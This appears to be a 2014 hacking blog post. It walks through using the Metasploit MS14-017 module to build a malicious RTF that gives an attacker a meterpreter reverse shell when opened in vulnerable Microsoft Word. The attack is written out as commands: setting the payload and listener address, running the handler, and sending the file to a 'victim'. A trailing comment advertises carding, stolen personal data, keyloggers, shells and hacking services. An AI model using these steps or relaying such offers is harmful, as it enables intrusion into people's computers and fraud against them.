Thursday 5 June 2014

How to Hack Remote Victim PC with MS Office Document ??

This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a list override count field can be modified to treat one structure as another. This bug was originally seen being exploited in the wild starting in April 2014. This module was created by reversing a public malware sample.

Exploit Targets:-

Microsoft Office 2010 SP2 


Requirement:-

Attacker: kali Linux
Victim PC: Windows 7

steps :-

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/ms14_017_rtf

msf exploit (ms14_017_rtf)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms14_017_rtf)>set lhost 192.168.1.7 (IP of Local Host)
 
msf exploit (ms14_017_rtf)>exploit

After we successfully generate the malicious rtf File, it will stored on your local computer
/root/.msf4/local/msf.rtf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.7 (lhost means local host)


exploit

Now send your msf.rtf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

Video Tutorial:-

1 comment:

  1. Tele-gram - @leadsupplier
    ICQ - 75 28 22 040
    Skype/Wickr - peeterhacks

    Stuff Available Now
    Cardi-ng
    Spam-ming
    Hac-king
    FULLZ/Pros/Leads
    Mailers
    Vir-uses
    Kal-i Lin-ux Full Package
    De-ep Web Complete Course
    Smtp's/rdp's/c-panles/shells
    BTC Cr-acker/Flasher
    Penetration Testing
    FB/WA Hac-king Tricks
    Ke-yloggers
    Combos
    Premium Accounts
    LOGs
    etc

    Feel Free to contact
    Guidance will be provided
    Available 24/7

    ReplyDelete